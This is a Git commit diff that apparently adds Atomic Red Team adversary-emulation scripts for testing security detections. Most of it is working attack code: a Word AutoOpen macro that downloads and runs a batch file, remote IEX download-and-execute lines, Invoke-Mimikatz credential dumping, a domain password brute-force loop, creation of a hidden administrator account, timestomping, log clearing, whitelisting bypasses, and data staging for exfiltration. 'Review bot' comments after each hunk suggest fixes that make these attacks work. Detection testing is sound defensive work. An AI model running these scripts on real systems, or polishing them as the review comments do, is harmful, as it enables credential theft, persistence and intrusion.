Merge pull request #1 from redcanaryco/master

update
This commit is contained in:
Ye Yint @ Rolan
2018-04-16 13:16:41 +08:00
committed by GitHub
185 changed files with 7310 additions and 215 deletions
+4
@@ -0,0 +1,4 @@
.idea
.DS_store
.vscode
.atom
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
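Review bot: `myURL = WinHttpReq.responseBody`, the line after `WinHttpReq.send`, overwrites the URL string with the raw response bytes and the value is never read again, so the assignment is dead and can be dropped (the body is written to `oStream` from `WinHttpReq.responseBody` directly below). The `.Open` call passes the literals `"username"` and `"password"` to an anonymous raw.githubusercontent.com fetch; dropping the two credential arguments avoids a reader assuming the download authenticates. `oStream` is never declared, which fails under `Option Explicit`; `Dim oStream As Object` next to the `fso` declaration fixes it. Closing the stream before the `Shell` call, rather than after, also reads more naturally since the file is already saved at that point.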
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
+1
@@ -0,0 +1 @@
# Chain Reactions
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
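Review bot: The script downloads the same payload twice (`$temp\1.bat` and `$temp\2.bat`) but only executes `1.bat` on the last line, and neither file is removed afterwards, so `2.bat` is an unused artifact left in TEMP. If the second download exists only to show how the `curl` alias looks in telemetry, a comment stating that `2.bat` is deliberately never run plus a trailing `Remove-Item $temp\1.bat, $temp\2.bat` would make intent and cleanup explicit. Note also that `wget`/`curl` resolve to `Invoke-WebRequest` only in Windows PowerShell; PowerShell 6+ removed those aliases, so both names fall through to native binaries that do not accept `-OutFile`, and the header comment should state the Windows PowerShell 5.1 requirement.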
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
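Review bot: `Executing X86 AllTheThings Test`, the line after `REM X86`, is neither a comment nor an `echo`, so cmd.exe tries to run a program called `Executing` and prints "'Executing' is not recognized" before continuing. Make it `echo Executing X86 AllTheThings Test` (or prefix it with `::`) and add the matching `echo Executing AMD64 AllTheThings Test` after `REM AMD64` so both halves announce themselves. The file also mixes `::` and `REM` comment styles; using `::` throughout keeps it consistent with the other Chain Reaction batch files in this commit.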
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
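Review bot: The cleanup `del test.txt` on the last line is commented out, so the timestomped `test.txt` is left behind, while the PowerShell twin of this script (the `.ps1` hunk that follows) does delete it; the two variants should agree, either by uncommenting the `del` or by adding a comment saying the artifact is intentionally kept for review. `echo "Atomic Test File" > test.txt` in cmd writes the double quotes into the file as well, since `echo` does not strip them; `echo Atomic Test File > test.txt` matches what `set-content` produces in the `.ps1`. `SCHTASKS /Delete /TN "Atomic Testing" /F` runs immediately after `/Run`, so the 30-minute `/mo` repeat never fires and at most a single regsvr32 launch is generated; if that is the intent, a one-line comment would save the next reader from wondering.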
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
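Review bot: The `powershell.exe "IEX (New-Object Net.WebClient).DownloadString(...)"` line spawns a second powershell.exe from a script that is already running in PowerShell; if the child process is deliberate (to produce the same process-creation telemetry as the batch twin), say so in the comment above it, otherwise invoking the expression in-process is the idiomatic form. The timestomp one-liner `$file=(gi test.txt);$date=...` packs five statements on one line; splitting it one statement per line, and using the same `'7/16/1945 5:29am'` literal as the `.bat` twin, keeps the two variants diffable. There is no error handling, so if `set-content` fails the following `gi test.txt` throws and the comments no longer describe what happened; `$ErrorActionPreference = 'Stop'` at the top makes such a failure obvious instead of half-running the sequence.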
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
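Review bot: `tasklist.exe | findstr cb`, `findstr virus` and `findstr defender` are case-sensitive, so process names spelled with capitals are not matched; add `/I` (`tasklist.exe | findstr /I defender`) here and in the identical three lines of the Reactor hunk later in this commit. `dir /s c:\ >> %temp%\download` walks the entire drive, which can take minutes on a large volume, and appends to an extension-less file that is never cleaned up; consider a narrower root or a trailing `del %temp%\download`. The Account Discovery link points at the technique matrix page rather than `https://attack.mitre.org/wiki/Technique/T1087` as used elsewhere in this commit, and the bare `:: Execution` label above the Network Configuration block looks like a leftover.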
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
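Review bot: The script creates a recurring scheduled task (`/SC MINUTE ... /mo 30`) and a local administrator account `Trevor` with a hard-coded password, and neither is removed before `pause`, so every run leaves persistent artifacts on the host. Add a cleanup tail (`SCHTASKS /Delete /TN "Atomic Testing" /F`, `net localgroup administrators Trevor /delete`, `net user Trevor /delete`) or state in the header that cleanup is intentionally manual, as the other Chain Reaction scripts in this commit do for their tasks. The `powershell.exe "IEX ...Discovery.bat" > output.txt` line hands cmd syntax (`&`-chained `net`/`reg` commands) to Invoke-Expression, which will most likely fail to parse rather than run the discovery; downloading with `-OutFile` and running the file with `cmd /c`, as the Argonaut hunk does, is the working pattern.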
+106
@@ -0,0 +1,106 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hidden Files and Directories https://attack.mitre.org/wiki/Technique/T1158
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Data Compresssed https://attack.mitre.org/wiki/Technique/T1002
# Technique: Data Encrypted https://attack.mitre.org/wiki/Technique/T1022
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File https://attack.mitre.org/wiki/Technique/T1107
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
# rm -rf /tmp/.exfil/
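Review bot: The shebang is `#!/bin/sh` but the script uses bash-only syntax: `[[ "$MACCHECK" == "Mac" ]]` and `[ "$PLAT" == "Mac" ]`, which on a POSIX `/bin/sh` such as dash fail with "[[: not found" and "unexpected operator", so the platform branch either aborts or always takes the Linux path. Either change the first line to `#!/bin/bash` or use `[ "$MACCHECK" = "Mac" ]` and `[ "$PLAT" = "Mac" ]` throughout; the `if [ "$PLAT" = "Mac" ]` form already used for the release block is the portable one. `MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"` prints "command not found" to stderr on every Linux run; `2>/dev/null` inside the substitution keeps the output clean. `split -a 15 -b 23` matches the header comment, but 23-byte chunks produce thousands of part files for a zip of any size; a brief comment on why that size was chosen would help the next maintainer.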
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
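Review bot: The multiple-endpoint `@FOR` line is missing the closing single quote of its `in (...)` clause: `findstr "Active Disc") do` should read `findstr "Active Disc"') do`, as in the commented single-endpoint example above it; as written cmd reports a syntax error for that line. The three `tasklist.exe | findstr ...` filters are case-sensitive without `/I` (same issue raised on the Fission hunk). `copy %%f c:\temp\` assumes `c:\temp` exists, and `for /R c:` without a trailing backslash I believe enumerates from the current directory of drive C rather than its root; `mkdir c:\temp 2>nul` beforehand and `for /R c:\ %%f in (*.docx) do copy "%%f" c:\temp\` cover both, with the quotes handling document names containing spaces.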
+36
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
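Review bot: The Step 2 discovery sequence is a single `&`-chained line of several dozen `net`, `reg query` and `wmic` invocations, which makes the file hard to review or partially reuse and hides which command produced a given error. Splitting it one command per line (cmd runs them sequentially either way) would read like the rest of this commit's batch files; alternatively, point at the `Discovery.bat` payload that the comment above already references instead of inlining it. Two of the `reg query` keys use a doubled backslash (`Winlogon\\Shell`), which looks like a copy artifact and is worth normalising even if `reg` happens to tolerate it. Minor: the task is created as `spawn` and deleted as `Spawn`; schtasks names are case-insensitive, but matching the spelling avoids a double take.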
+1
@@ -0,0 +1 @@
Downloaded Remote Content
Binary file not shown.
+110
@@ -0,0 +1,110 @@
## Create the directory for invocation proofs
if(-not (Test-Path $env:TEMP\AtomicRedTeam))
{
$null = New-Item -Type Directory $env:TEMP\AtomicRedTeam
}
## Register for cleanup
$MyInvocation.MyCommand.ScriptBlock.Module.OnRemove = {
Remove-Item $env:TEMP\AtomicRedTeam -Recurse
}
$actions = @{
'Windows/Execution/BitsAdmin' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Execution/BitsAdmin.md -SectionName bitsadmin.exe
## Launch the action
Invoke-Expression $commands[0]
}
'Windows/Execution/Trusted_Developer_Utilities/MSBuild' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Execution/Trusted_Developer_Utilities.md -SectionName msbuild.exe
$commandToInvoke,$commandArgs = $commands[0] -split ' '
## Run it, but with the real MSBuildBypass we've got in /Windows/Payloads
& $commandToInvoke ..\Windows\Payloads\MSBuildBypass.csproj
}
'Windows/Lateral_Movement/Remote_Desktop_Protocol_Hijack' = {
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Lateral_Movement/Remote_Desktop_Protocol.md -SectionName 'RDP hijacking'
## Launch the actions
foreach($command in $commands)
{
Invoke-Expression $command 2>&1
}
}
'Windows/Defense_Evasion/Indicator_Removal_on_Host/System' = {
if($Force -or $PSCmdlet.ShouldContinue("Do you with to clear the System log?", "Confirm impactful change"))
{
## Extract the command from the page
$commands = Get-ActionCode -Path $PSScriptRoot/../Windows/Defense_Evasion/Indicator_Removal_on_Host.md -SectionName 'wevtutil' |
Where-Object { $_ -match 'System' }
## Launch the action
Invoke-Expression $commands[0]
}
}
}
function Get-ActionCode
{
param($Path, $SectionName)
$sections = Get-Content $Path -Delimiter '###'
,@($sections |
Where-Object { $_ -like "*$SectionName*" } |
Select-String " (.*)" -AllMatches |
ForEach-Object { $_.Matches.Captures.Value.Trim() })
}
function Invoke-Action
{
param(
[Parameter(Mandatory, Position = 0)]
$Action,
[Parameter()]
[Switch] $Force
)
$Action = $Action -replace "\\","/"
foreach($possibleAction in $actions.Keys)
{
if($possibleAction -like $Action)
{
$actionCode = $actions[$possibleAction]
& $actionCode
}
}
}
function Get-Action
{
param(
[Parameter(Position = 0)]
$Action = "*"
)
$Action = $Action -replace "\\","/"
foreach($possibleAction in $actions.Keys)
{
if($possibleAction -like $Action)
{
$possibleAction
}
}
}
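Review bot: The MSBuild action runs `& $commandToInvoke ..\Windows\Payloads\MSBuildBypass.csproj` with a path relative to the caller's current directory, while every other action anchors on `$PSScriptRoot`, so invoked from anywhere other than the module folder the build fails with a missing project. Use `& $commandToInvoke "$PSScriptRoot\..\Windows\Payloads\MSBuildBypass.csproj"` and drop `$commandArgs`, which is assigned from the split but never used. The Indicator_Removal block reads `$Force` and `$PSCmdlet`, which appear to resolve only because the scriptblock is invoked from inside `Invoke-Action`; a comment above the `$actions` table such as `## Action blocks may rely on $Force and $PSCmdlet of Invoke-Action; do not invoke them directly` would prevent surprises. The README in this commit documents `Get-ArtAction`/`Invoke-ArtAction` while the module defines `Get-Action`/`Invoke-Action`; unless the `.psd1` (not in this diff) sets `DefaultCommandPrefix = 'Art'`, one of the two needs updating. The prompt string `"Do you with to clear the System log?"` should read `wish`.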
+121
@@ -0,0 +1,121 @@
# Automation Framework for the Atomic Red Team
The Atomic Red Team project is unique in that it not only describes the tactics and techiques of the MITRE ATT&CK framework, but it also includes automation of these techniques.
Automation of this framework comes by way of this PowerShell module, ```AtomicRedTeam```.
Here's a quick example:
```
PS > Import-Module .\AtomicRedTeam.psd1
PS > Get-ArtAction Windows/Ex*
Windows/Execution/Trusted_Developer_Utilities/MSBuild
Windows/Execution/BitsAdmin
PS > Invoke-ArtAction Windows/Execution/Trusted_Developer_Utilities/MSBuild
Microsoft (R) Build Engine version 4.7.2556.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.
Build started 4/15/2018 4:48:44 PM.
Hello From a Code Fragment
Hello From a Class.
Build succeeded.
0 Warning(s)
0 Error(s)
Time Elapsed 00:00:00.18
PS >
```
As we can see, the MSBuild technique was able to run arbitrary C#.
## Contributing to the Automation Framework
